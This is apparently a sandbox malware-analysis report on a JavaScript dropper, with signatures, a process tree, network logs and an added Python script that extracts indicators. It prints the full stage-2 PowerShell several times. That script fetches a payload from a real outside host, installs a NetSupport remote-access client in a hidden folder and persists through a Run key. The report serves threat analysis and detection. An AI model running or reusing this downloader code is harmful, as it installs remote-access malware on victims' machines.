Analysis

  • max time kernel
    135s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/10/2024, 13:15 UTC

General

  • Target

    c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js

  • Size

    5.2MB

  • MD5

    a495fbc9b99c98d0a054e937d4dcb944

  • SHA1

    b2a2433591576985adce5da344d72ae669a9cc5f

  • SHA256

    c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e

  • SHA512

    67ffdf2a2541127bcd1cf05b8f4c47e99844fb9a01ec33d5ff538e6a176eade5636f20c096e783f5d1c5b849ec2ee952a89a3fc35286d1e0e1000c0a21d39c6a

  • SSDEEP

    49152:OCz4F9dM2furCz4F9dM2fuVCz4F9dM2furCz4F9dM2fu+Cz4F9dM2furCz4F9dMW:OkGgkGMkGgkGbkGgkGMkGgkG9

Malware Config

Extracted

Language
ps1
Source
1
# Stage 2 as extracted by the sandbox, split at statement boundaries and annotated; behaviour unchanged.
$DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';
# Fetch the base64-encoded ZIP over HTTPS and decode it in memory.
$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);
$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);
# Random suffix in -5..11 (Get-Random -Maximum is exclusive) varies the drop folder name per run.
$asd = Get-Random -Minimum -5 -Maximum 12;
$EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;
if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };
# Write CXCC.zip into %APPDATA%\DEXHCUYIT<n> and extract it in place.
$p=Join-Path $EENLMJVX 'CXCC.zip';
[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);
try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};
# Launch the NetSupport client from the extracted archive.
$CV=Join-Path $EENLMJVX 'client32.exe';
if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};
# Hide the drop folder and persist through an HKCU Run value named PBHHYCWP.
$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';
$s=$EENLMJVX+'\client32.exe';
$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
$v='PBHHYCWP';
$ASDASD='String';
New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
URLs
ps1.dropper

https://adullamglobal.com/work/das.php?13401

exe.dropper

https://adullamglobal.com/work/das.php?13401
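
The stage-2 script above can be mined for indicators without executing it. The following is an added example, not part of the tria.ge report: it resolves the script's literal assignments, pulls out the payload URL, drop folder, archive and executable names and the Run key, and expands the Get-Random suffix into every folder name the dropper can produce (the sandbox happened to get DEXHCUYIT0, but the suffix ranges from -5 to 11 because -Maximum is exclusive). The script text is the one shown in the report; the only assumption is the %APPDATA% path passed to expected_run_data, taken from the process tree.

```python
"""
Added example, not part of the tria.ge report: extract the indicators from the
PowerShell stage shown under "Malware Config" without running it, and expand
the randomised drop-folder name into every value it can take.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# The one-liner exactly as the sandbox extracted it (copied from the report).
STAGE2 = r"""$DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;"""


@dataclass
class DropperConfig:
    payload_url: str                # where the base64 ZIP is fetched from
    drop_dir_prefix: str            # folder name under %APPDATA% before the random suffix
    drop_dir_candidates: list[str]  # every folder name Get-Random can produce
    zip_name: str
    exe_name: str
    run_key: str
    run_value_name: str
    hidden_dir: bool


def _first(pattern: str, text: str, what: str) -> tuple[str, ...]:
    m = re.search(pattern, text)
    if not m:
        raise ValueError(f"dropper script does not contain the expected {what}")
    return m.groups()


def parse_dropper(script: str) -> DropperConfig:
    # Resolve $NAME='literal' assignments so indirect references can be followed.
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", script))
    (url_var,) = _first(r"DownloadString\(\$(\w+)\)", script, "DownloadString call")
    prefix, rand_var = _first(
        r"GetFolderPath\('ApplicationData'\)\+'\\(\w+)'\+\$(\w+)", script, "drop folder")
    lo, hi = _first(r"\$" + re.escape(rand_var)
                    + r"\s*=\s*Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)",
                    script, "Get-Random range")
    # Get-Random: -Minimum is inclusive, -Maximum is exclusive.
    candidates = [f"{prefix}{n}" for n in range(int(lo), int(hi))]
    (zip_name,) = _first(r"Join-Path\s+\$\w+\s+'([^']+\.zip)'", script, "zip name")
    (exe_name,) = _first(r"Join-Path\s+\$\w+\s+'([^']+\.exe)'", script, "exe name")
    key_var, name_var = _first(
        r"New-ItemProperty\s+-Path\s+\$(\w+)\s+-Name\s+\$(\w+)", script, "Run key write")
    return DropperConfig(
        payload_url=literals[url_var],
        drop_dir_prefix=prefix,
        drop_dir_candidates=candidates,
        zip_name=zip_name,
        exe_name=exe_name,
        run_key=literals[key_var],
        run_value_name=literals[name_var],
        hidden_dir="attributes='Hidden'" in script,
    )


def expected_run_data(cfg: DropperConfig, appdata: str) -> set[str]:
    """Every value the Run key can hold for one user's %APPDATA%. The sandbox saw
    suffix 0; the script can pick any of the 17 candidates."""
    return {f"{appdata}\\{d}\\{cfg.exe_name}" for d in cfg.drop_dir_candidates}


if __name__ == "__main__":
    cfg = parse_dropper(STAGE2)
    print(cfg.payload_url, cfg.run_key, cfg.run_value_name)
    for path in sorted(expected_run_data(cfg, r"C:\Users\Admin\AppData\Roaming")):
        print(path)
```

The point of expanding the candidates is that a hunt keyed on the literal path from the sandbox (DEXHCUYIT0) would miss 16 of 17 infections; match on the prefix, the Run value name, or the file set instead.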

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as legitimate system administration software.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, most likely for geofencing.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe
        "C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1540

Network

  • flag-us
    DNS
    adullamglobal.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    adullamglobal.com
    IN A
    Response
    adullamglobal.com
    IN A
    79.141.162.186
  • flag-us
    POST
    https://adullamglobal.com/work/fix.php?2046
    wscript.exe
    Remote address:
    79.141.162.186:443
    Request
    POST /work/fix.php?2046 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: adullamglobal.com
    Content-Length: 7
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 13:15:29 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=updates.js
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: must-revalidate
    Pragma: public
    Content-Length: 2274419
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/octet-stream
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    DNS
    r11.o.lencr.org
    wscript.exe
    Remote address:
    8.8.8.8:53
    Request
    r11.o.lencr.org
    IN A
    Response
    r11.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    2.18.190.73
    a1887.dscq.akamai.net
    IN A
    2.18.190.80
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    61.45.26.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    61.45.26.184.in-addr.arpa
    IN PTR
    Response
    61.45.26.184.in-addr.arpa
    IN PTR
    a184-26-45-61.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    186.162.141.79.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    186.162.141.79.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=2F289F00A97362650A708A22A87563F0; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:28 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 18894B10D9214D3A9C364DB544D487DD Ref B: LON601060108040 Ref C: 2024-10-24T13:15:28Z
    date: Thu, 24 Oct 2024 13:15:28 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2F289F00A97362650A708A22A87563F0
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:29 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3E7BB815C5CE4ABE814A8980B10CD154 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
    date: Thu, 24 Oct 2024 13:15:28 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2F289F00A97362650A708A22A87563F0; MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: DC27CC5E6A3945609D12E6D6CE07ABC8 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
    date: Thu, 24 Oct 2024 13:15:29 GMT
  • flag-gb
    GET
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D
    wscript.exe
    Remote address:
    2.18.190.73:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: r11.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "D2C54317F18E11A735A6475A5F6058D8BAE2F323505325378815102EBB763711"
    Last-Modified: Wed, 23 Oct 2024 10:58:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=12764
    Expires: Thu, 24 Oct 2024 16:48:12 GMT
    Date: Thu, 24 Oct 2024 13:15:28 GMT
    Connection: keep-alive
  • flag-us
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    10.27.171.150.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.27.171.150.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    88.156.103.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.156.103.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://adullamglobal.com/work/das.php?13401
    powershell.exe
    Remote address:
    79.141.162.186:443
    Request
    GET /work/das.php?13401 HTTP/1.1
    Host: adullamglobal.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 13:15:33 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    geo.netsupportsoftware.com
    client32.exe
    Remote address:
    8.8.8.8:53
    Request
    geo.netsupportsoftware.com
    IN A
    Response
    geo.netsupportsoftware.com
    IN A
    172.67.68.212
    geo.netsupportsoftware.com
    IN A
    104.26.0.231
    geo.netsupportsoftware.com
    IN A
    104.26.1.231
  • flag-us
    GET
    http://geo.netsupportsoftware.com/location/loca.asp
    client32.exe
    Remote address:
    172.67.68.212:80
    Request
    GET /location/loca.asp HTTP/1.1
    Host: geo.netsupportsoftware.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 13:15:37 GMT
    Content-Type: text/html; Charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Ray: 8d7a3c986b0f948d-LHR
    CF-Cache-Status: DYNAMIC
    Access-Control-Allow-Origin: *
    Cache-Control: private
    Set-Cookie: ASPSESSIONIDQQCQBADR=IEOBCDPAAFBIPIABLMGHLFAC; path=/
    Strict-Transport-Security: max-age=31536000; includeSubDomains
    Vary: Accept-Encoding
    cf-apo-via: origin,host
    Referrer-Policy: strict-origin-when-cross-origin
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyhUpNqH9W8t%2FmJnQ6JaeU5eY1ZJm%2BjvfF8KVi4IldniyyManFpQYciBPOgynYcm0YHxGCw8Vzjgv9Stg5yRq6QstsqUcKEuI9BQaWGiaAsxwiJE%2FRdscv%2FSlq4DtMeLe%2BSaTMWga70rGBSb"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
  • flag-us
    DNS
    143.159.181.5.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    143.159.181.5.in-addr.arpa
    IN PTR
    Response
    143.159.181.5.in-addr.arpa
    IN PTR
    5-181-159-143.mivocloud.com
  • flag-us
    DNS
    212.68.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.68.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    79.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.190.18.2.in-addr.arpa
    IN PTR
    Response
    79.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-79.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 493712
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B296B5E3F52C4072A680F582D3682D1C Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 619595
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E68ACF3F1B2142DF937229ACA8E15473 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 522409
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 90C2CA5B5848470FB9CB1140F62BC6CA Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 534196
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
